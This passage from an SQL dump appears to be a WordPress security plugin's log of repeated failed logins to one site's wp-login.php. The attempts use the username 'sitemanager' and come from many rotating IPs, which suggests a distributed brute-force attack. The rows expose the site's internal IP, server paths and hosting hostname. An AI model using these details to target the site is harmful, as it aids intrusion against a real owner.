\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745995791.478018;s:12:\"REQUEST_TIME\";i:1745995791;}}','63.250.38.151',0,'2025-04-30 12:19:53','1970-01-01 00:00:00'),(94497,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50780\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.85\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745996123.064286;s:12:\"REQUEST_TIME\";i:1745996123;}}','198.54.114.85',0,'2025-04-30 12:25:24','1970-01-01 00:00:00'),(94498,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42518\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745996451.8295619;s:12:\"REQUEST_TIME\";i:1745996451;}}','45.67.14.64',0,'2025-04-30 12:30:53','1970-01-01 00:00:00'),(94499,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42214\";s:11:\"REMOTE_ADDR\";s:15:\"114.119.174.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745997124.9048901;s:12:\"REQUEST_TIME\";i:1745997124;}}','114.119.174.226',0,'2025-04-30 12:42:06','1970-01-01 00:00:00'),(94500,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33090\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745997462.101938;s:12:\"REQUEST_TIME\";i:1745997462;}}','162.0.209.248',0,'2025-04-30 12:47:43','1970-01-01 00:00:00'),(94501,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54702\";s:11:\"REMOTE_ADDR\";s:13:\"162.19.67.137\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745997797.387805;s:12:\"REQUEST_TIME\";i:1745997797;}}','162.19.67.137',0,'2025-04-30 12:53:19','1970-01-01 00:00:00'),(94502,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41220\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745998129.8397911;s:12:\"REQUEST_TIME\";i:1745998129;}}','162.0.215.190',0,'2025-04-30 12:58:51','1970-01-01 00:00:00'),(94503,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51976\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.104.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745998464.2945731;s:12:\"REQUEST_TIME\";i:1745998464;}}','134.209.104.76',0,'2025-04-30 13:04:26','1970-01-01 00:00:00'),(94504,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49668\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745998806.457504;s:12:\"REQUEST_TIME\";i:1745998806;}}','103.169.35.190',0,'2025-04-30 13:10:08','1970-01-01 00:00:00'),(94505,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"30988\";s:11:\"REMOTE_ADDR\";s:12:\"89.46.109.92\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745999174.040041;s:12:\"REQUEST_TIME\";i:1745999174;}}','89.46.109.92',0,'2025-04-30 13:16:15','1970-01-01 00:00:00'),(94506,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39354\";s:11:\"REMOTE_ADDR\";s:13:\"162.241.92.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745999546.1650541;s:12:\"REQUEST_TIME\";i:1745999546;}}','162.241.92.55',0,'2025-04-30 13:22:27','1970-01-01 00:00:00'),(94507,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 